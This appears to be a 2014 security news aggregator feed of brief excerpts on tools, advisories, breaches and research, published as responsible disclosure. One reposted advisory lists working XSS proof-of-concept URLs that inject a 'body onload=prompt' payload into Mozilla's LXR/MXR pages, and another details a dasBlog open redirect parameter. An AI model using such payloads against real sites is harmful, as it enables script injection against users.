October 18, 2014, 2:11 am
OnionPhone (OPH) is a VOIP tool for calling over Tor network which can be used as a VOIP plugin for TorChat. Call is targeted to the onion address of the recipient (its hidden service HS).
OPH provides independent level of p2p encryption and authentication which employs modern cryptographic primitives: Diffe-Hellmann key exchange on Elliptic Curve 25519 and Keccak Sponge Duplexing encryption. In the case of a call to the onion address Tor protects against MitM attacks. Also the recipient can verify identity of the originator’s onion address (only with the permission of the sender) similarly to the TorChat authentication.
more here.............https://github.com/gegel/onionphone/
![]()
↧
October 18, 2014, 2:52 am
This script modifies the current user's Spotlight preferences, disabling sharing of Spotlight searches with Apple. Spotlight appears to send live keystrokes directly to Apple notes Landon Fuller of Plausible Labs Cooperative, Inc.
more here............https://fix-macosx.com/
![]()
↧
↧
October 19, 2014, 3:47 am
ADVobfuscator demonstates how to use C++11 language to generate, at compile time, obfuscated code without using any external tool and without modifying the compiler. The technics presented rely only on C++11, as standardized by ISO. It shows also how to introduce some form of randomness to generate polymorphic code and it gives some concrete examples like the encryption of strings literals and the obfuscation of calls using finite state machines.
more here...........https://github.com/andrivet/ADVobfuscator
![]()
↧
October 19, 2014, 4:42 am
Most targeted attacks against organizations originate as spear-phish campaigns or watering hole style
web driveby attacks. Within the last six months, Invincea has discovered and stopped targeted
malvertizing attacks against specific companies -- particularly those in the Defense Industrial Base. The combination of traditional cyber crime methods (malvertising) with targeted attacks against Defense industrials for theft of IP represents another development in the on-going blending of techniques from cyber crime and advanced threat actors with nation state agendas. We are tracking an on-going campaign against US Defense companies under the code name Operation DeathClick.
more here............http://www.invincea.com/wp-content/uploads/2014/10/Micro-Targeted-Malvertising-WP-FINAL-10-18-14.pdf
![]()
↧
October 19, 2014, 8:33 am
Over the years, many managed security service providers have been publishing variants of an external Threat Analysis in one form or another. Annual, Quarterly, Weekly, Daily, and live feeds are regular deliverables now from anyone who is anyone in the Security Industry.
Great news, right? Well... sort of...
The fact is, that each of these service providers had their own proprietary naming conventions and threat report formats. This made it difficult for the consumer of these reports and feeds to understand what information was redundant, and what was really important.
more here..........http://security-musings.blogspot.ca/2014/10/know-your-threat-landscape-standardized.html
![]()
↧
↧
October 20, 2014, 3:07 am
A proof of concept (for Flash 14.0.0.145) of a heap-based buffer overflow patched on September 9th, affecting Flash 13.0.0.<244, 14.0.0.<=179 15.0.0.<152 was published on September 30th on Packet Storm . Code targeting that CVE is now in Nuclear Pack.
more here..........http://malware.dontneedcoffee.com/2014/10/cve-2014-0556-adobe-flash-player.html
![]()
↧
October 20, 2014, 3:08 am
Exploit Title: Newtelligence dasBlog Open Redirect VulnerabilityProduct: dasBlogVendor: NewtelligenceVulnerable Versions: 2.3 (2.3.9074.18820) 2.2 (2.2.8279.16125)2.1(2.1.8102.813)Tested Version: 2.3 (2.3.9074.18820)Advisory Publication: OCT 15, 2014Latest Update: OCT 15, 2014Vulnerability Type: Open Redirect [CWE-601]CVE Reference: CVE-2014-7292Risk Level: LowCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]Advisory Details:Newtelligence dasBlog ct.ashx is vulnerable to Open Redirect attacks.dasBlog supports a feature called Click-Through which basically tracks alllinks clicked inside your blog posts. It's a nice feature that allows theblogger to stay informed what kind of content readers like. IfClick-Through is turned on, all URLs inside blog entries will be replacedwith <URL to your blog>/ct.ashx?id=<Blog entry ID>&url=<URL-encodedoriginal URL> which of course breaks WebSnapr previews.Web.config code:<add verb="*" path="ct.ashx"type="newtelligence.DasBlog.Web.Services.ClickThroughHandler,newtelligence.DasBlog.Web.Services"/>(1) The vulnerability occurs at "ct.ashx?" page, with "&url" parameter.Solutions:2014-10-15 Public disclosure with self-written patch.References:http://www.tetraph.com/blog/cves/cve-2014-7292-newtelligence-dasblog-open-redirect-vulnerability/https://searchcode.com/codesearch/view/8710666/https://www.microsoft.com/web/gallery/dasblog.aspxhttps://dasblog.codeplex.com/releases/view/86033http://cwe.mitre.orghttp://cve.mitre.org/ ![]()
↧
October 20, 2014, 3:09 am
Domains:http://lxr.mozilla.org/http://mxr.mozilla.org/(The two domains above are almost the same)Websites information:lxr.mozilla.org, mxr.mozilla.org are cross references designed to displaythe Mozilla source code. The sources displayed are those that are currentlychecked in to the mainline of the mozilla.org CVS server, Mercurial Server,and Subversion Server; these pages are updated many times a day, so theyshould be pretty close to the latest‑and‑greatest. (from Mozilla)Vulnerability description:All pages under the following two URLs are vulnerable.http://lxr.mozilla.org/mozilla-central/sourcehttp://mxr.mozilla.org/mozilla-central/sourceThis means all URLs under the above two domains can be used for XSS attackstargeting Mozilla's users.Since there are large number of pages under them. Meanwhile, the contentsof the two domains vary. This makes the vulnerability very dangerous.Attackers can use different URLs to design XSS attacks to Mozilla's varietyclass of users.The vulnerability have been reported to bugzilla.mozilla.org. Mozilla aredealing with this issue.POCs:http://lxr.mozilla.org/mozilla-central/source/<bodyonload=prompt("justqdjing")>http://lxr.mozilla.org/mozilla-central/source/mobile/android/<bodyonload=prompt("justqdjing")>http://lxr.mozilla.org/mozilla-central/source/Android.mk/<bodyonload=prompt("tetraph")>http://lxr.mozilla.org/mozilla-central/source/storage/public/mozIStorageBindingParamsArray.idl/<bodyonload=prompt("tetraph")>http://lxr.mozilla.org/mozilla-central/source/netwerk/protocol/device/AndroidCaptureProvider.cpp<bodyonload=prompt("tetraph")>http://mxr.mozilla.org/mozilla-central/source/<bodyonload=prompt("justqdjing")>http://mxr.mozilla.org/mozilla-central/source/webapprt/<bodyonload=prompt("justqdjing")>http://mxr.mozilla.org/mozilla-central/source/mozilla-config.h.in/<bodyonload=prompt("justqdjing")>http://mxr.mozilla.org/mozilla-central/source/chrome/nsChromeProtocolHandler.h/<bodyonload=prompt("tetraph")>http://mxr.mozilla.org/mozilla-central/source/security/sandbox/linux/x86_32_linux_syscalls.h/<bodyonload=prompt("tetraph")>POC Video:https://www.youtube.com/user/tetraphVulnerability Analysis:Take the following link as an example,http://lxr.mozilla.org/mozilla-central/source/chrome/<attacktest>We can see that for the page reflected, it contains the following codes.<a href="/mozilla-central/source/chrome/%253Cattacktest%253E"><attacktest></attacktest></a>If we insert "<body onload=prompt("justqdjing")>" into the URL, the codecan be executed.The vulnerability can be attacked without user login. My tests wereperformed on Firefox (26.0) in Ubuntu (12.04) and IE (9.0.15) in Windows 7.Cross-site scripting (XSS) is a type of computer security vulnerabilitytypically found in Web applications. XSS enables attackers to injectclient-side script into Web pages viewed by other users. A cross-sitescripting vulnerability may be used by attackers to bypass access controlssuch as the same origin policy. (From Wikipedia)Posted By:Wang Jing, mathematics student from Nanyang Technological University,Singapore.http://tetraph.com/wangjing/More Details:http://www.tetraph.com/blog/xss-vulnerability/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/http://lxr.mozilla.org/mozilla-central/sourcehttp://mxr.mozilla.org/mozilla-central/source ![]()
↧
October 20, 2014, 3:12 am
A few days ago, I gave a presentation at Ruxcon about breaking international voicemail security. Whilst the crowd and conference were absolutely amazing - my overall research, I think has a much wider scope in the terms of whom it could affect. This blog post acts as a technical writeup and companion to my slides presented at Ruxcon.
TL;DR Briefly put, through researching the visual voicemail protocol, we were able to document a number of different vulnerabilities, including some which affected the third largest telco in Australia (30% market share) however the findings could affect a large number of other telco's internationally.
more here..........https://shubh.am/breaking-international-voicemail-security-via-vvm-exploitation/
![]()
↧
↧
October 20, 2014, 3:16 am
This is a criticism about Ashar Javed's BlackHat EU Talk: Revisiting XSS Sanitization.
I believe as in any field of science we need to have a discussion about published research. Especially when we think there is something wrong with the "experiments" and the resulting conclusion. Maybe I'm completly overlooking something, but at this point I don't even understand how this talk got accepted to a renowned conference like Black Hat.
First I want to give a quick summary of what Ashar Javed claims. Then I want to talk about what I thought is the consensus of the security community regarding XSS. And at the end I want to evaluate his conclusion/solution. Unfortunately I haven't seen his talk, so I can only read his paper and guess what he said during those 168 slides.
more here.........https://www.smrrd.de/criticism-revisiting-xss-sanitization.html
![]()
↧
October 20, 2014, 4:07 am
Molly also has an OTA available to LPX13D. It only took me a couple of hours to get my ADT-1 to actually accept it. As with the new Nexus 5 and 7 previews, this device needs a modified kernel for root.
It's all a bit clumsy and will be easier in the future, but here's how you get root on it:
more here...........https://plus.google.com/+Chainfire/posts/a5YshULM8hf
![]()
↧
October 20, 2014, 4:07 am
Tcpdump is just one of the tools that will make troubleshooting network issues, or testing applications, or even finding out what traffic is being generated on a host. This podcast is to help you understand the Tcpdump program, and how powerful it is here............http://brakeingsecurity.com/keep-calm-and-take-a-tcpdump
![]()
↧
October 20, 2014, 4:13 am
Three zero-day vulnerabilities - CVE-2014-4114, CVE-2014-4148, and CVE-2014-4113 - were reported last week and patched by Microsoft in their October 2014 Patch Tuesday. CVE-2014-4114, also known as the Sandworm vulnerability, can enable attackers to easily craft malware payloads when exploited.
This particular vulnerability has been linked to targeted attacks against European sectors and industries. In addition, our researchers found that Sandworm was also being used to target hit SCADA systems.
more here..........http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/
![]()
↧
↧
October 20, 2014, 9:49 am
Asterisk Project Security Advisory - AST-2014-011 Product Asterisk Summary Asterisk Susceptibility to POODLE Vulnerability Nature of Advisory Unauthorized Data Disclosure Susceptibility Remote Unauthenticated Sessions Severity Medium Exploits Known No Reported On 16 October 2014 Reported By abelbeck Posted On 20 October 2014 Last Updated On October 20, 2014 Advisory Contact Matt Jordan <mjordan AT digium DOT com> CVE Name CVE-2014-3566 Description The POODLE vulnerability - described under CVE-2014-3566 - is described at https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566. This advisory describes the Asterisk's project susceptibility to this vulnerability. The POODLE vulnerability consists of two issues: 1) A vulnerability in the SSL protocol version 3.0. This vulnerability has no known solution. 2) The ability to force a fallback to SSLv3 when a TLS connection is negotiated. Asterisk is susceptible to both portions of the vulnerability in different places. 1) The res_jabber and res_xmpp module both use SSLv3 exclusively, and are hence susceptible to POODLE. 2) The core TLS handling, used by the chan_sip channel driver, Asterisk Manager Interface (AMI), and the Asterisk HTTP server, defaults to allowing SSLv3/SSLv2 fallback. This allows a MITM to potentially force a connection to fallback to SSLv3, exposing it to the POODLE vulnerability. Resolution Asterisk has been patched such that it no longer uses SSLv3 for the res_jabber/res_xmpp modules. Additionally, when the encryption method is not specified, the default handling in the TLS core no longer allows for a fallback to SSLv3 or SSLv2. 1) Users of Asterisk's res_jabber or res_xmpp modules should upgrade to the versions of Asterisk specified in this advisory. 2) Users of Asterisk's chan_sip channel driver, AMI, and HTTP server may set the "tlsclientmethod" or "sslclientmethod" to "tlsv1" to force TLSv1 as the only allowed encryption method. Alternatively, they may also upgrade to the versions of Asterisk specified in this advisory. Users of Asterisk are encouraged to NOT specify "sslv2" or "sslv3". Doing so will now emit a WARNING. Affected Versions Product Release Series Asterisk Open Source 1.8.x All versions Asterisk Open Source 11.x All versions Asterisk Open Source 12.x All versions Certified Asterisk 1.8.28 All versions Certified Asterisk 11.6 All versions Corrected In Product Release Asterisk Open Source 1.8.31.1, 11.13.1, 12.6.1 Certified Asterisk 1.8.28-cert2, 11.6-cert7 Patches SVN URL Revision http://downloads.asterisk.org/pub/security/AST-2014-011-1.8.diff Asterisk 1.8 http://downloads.asterisk.org/pub/security/AST-2014-011-11.diff Asterisk 11 http://downloads.asterisk.org/pub/security/AST-2014-011-12.diff Asterisk 12 http://downloads.asterisk.org/pub/security/AST-2014-011-1.8.28.diff Certified Asterisk 1.8.28 http://downloads.asterisk.org/pub/security/AST-2014-011-11.6.diff Certified Asterisk 11.6 Links https://issues.asterisk.org/jira/browse/ASTERISK-24425 Asterisk Project Security Advisories are posted at http://www.asterisk.org/security This document may be superseded by later versions; if so, the latest version will be posted at http://downloads.digium.com/pub/security/AST-2014-011.pdf and http://downloads.digium.com/pub/security/AST-2014-011.html Revision History Date Editor Revisions Made October 19 Matt Jordan Initial Revision Asterisk Project Security Advisory - AST-2014-011 Copyright (c) 2014 Digium, Inc. All Rights Reserved. Permission is hereby granted to distribute and publish this advisory in its original, unaltered form. ![]()
↧
October 20, 2014, 1:08 pm
Users in China are reporting a MITM attacks on SSL connections to iCloud.
GreatFire.org, who monitor the Great Firewall of China (GFW), also published a blog post on their website earlier today saying:
This is clearly a malicious attack on Apple in an effort to gain access to usernames and passwords and consequently all data stored on iCloud such as iMessages, photos, contacts, etc.
more here..........http://www.netresec.com/?page=Blog&month=2014-10&post=Chinese-MITM-Attack-on-iCloud
![]()
↧
October 20, 2014, 1:13 pm
Sometimes when I'm doing security research I'll come across a bug which surprises me. I discovered just such a bug in the Windows version of Chrome which exposed a little-known security detail in the OS. The bug, CVE-2014-3196 was fixed in M38, so it seemed a good time for a blog post. The actual reported issue is here. While the bug didn’t allow for a full sandbox escape it did provide the initial part of a chain; something that’s still important to fix.
more here..........http://googleprojectzero.blogspot.com/2014/10/did-man-with-no-name-feel-insecure.html
![]()
↧
October 20, 2014, 1:14 pm
While revelations from Edward Snowden about the National Security Agency’s massive database of phone records have sparked a national debate about its constitutionality, another secretive database has gone largely unnoticed and without scrutiny.
The database, which affects unknown numbers of people, contains phone records that at least five police agencies in southeast Virginia have been collecting since 2012 and sharing with one another with little oversight.
more here...........http://www.wired.com/2014/10/virginia-police-secretively-stockpiling-private-phone-records/
![]()
↧
↧
October 20, 2014, 1:17 pm
Almost from the beginning when I released PDFiD, people asked me for anti-virus like feature: that PDFiD would tell you if a PDF was malicious or not. Some people even patched PDFiD with a scoring feature.
But I didn’t want to develop an “anti-virus” for PDFs; PDFiD is a triage tool.
Now you can develop your own scoring system with plugins.
more here........http://blog.didierstevens.com/2014/10/20/update-pdfid-with-plugins-part-1/
![]()
↧
October 20, 2014, 11:48 pm
Multiple banks say they have identified a pattern of credit and debit card fraud suggesting that several Staples Inc. office supply locations in the Northeastern United States are currently dealing with a data breach. Staples says it is investigating “a potential issue” and has contacted law enforcement.
more here.........http://krebsonsecurity.com/2014/10/banks-credit-card-breach-at-staples-stores/
![]()
↧
October 20, 2014, 11:50 pm
Apple designed the iOS platform with security at its core. When we set out to create the
best possible mobile platform, we drew from decades of experience to build an entirely
new architecture. We thought about the security hazards of the desktop environment,
and established a new approach to security in the design of iOS. We developed and
incorporated innovative features that tighten mobile security and protect the entire
system by default. As a result, iOS is a major leap forward in security for mobile devices.
more here...........https://www.apple.com/privacy/docs/iOS_Security_Guide_Oct_2014.pdf
![]()
↧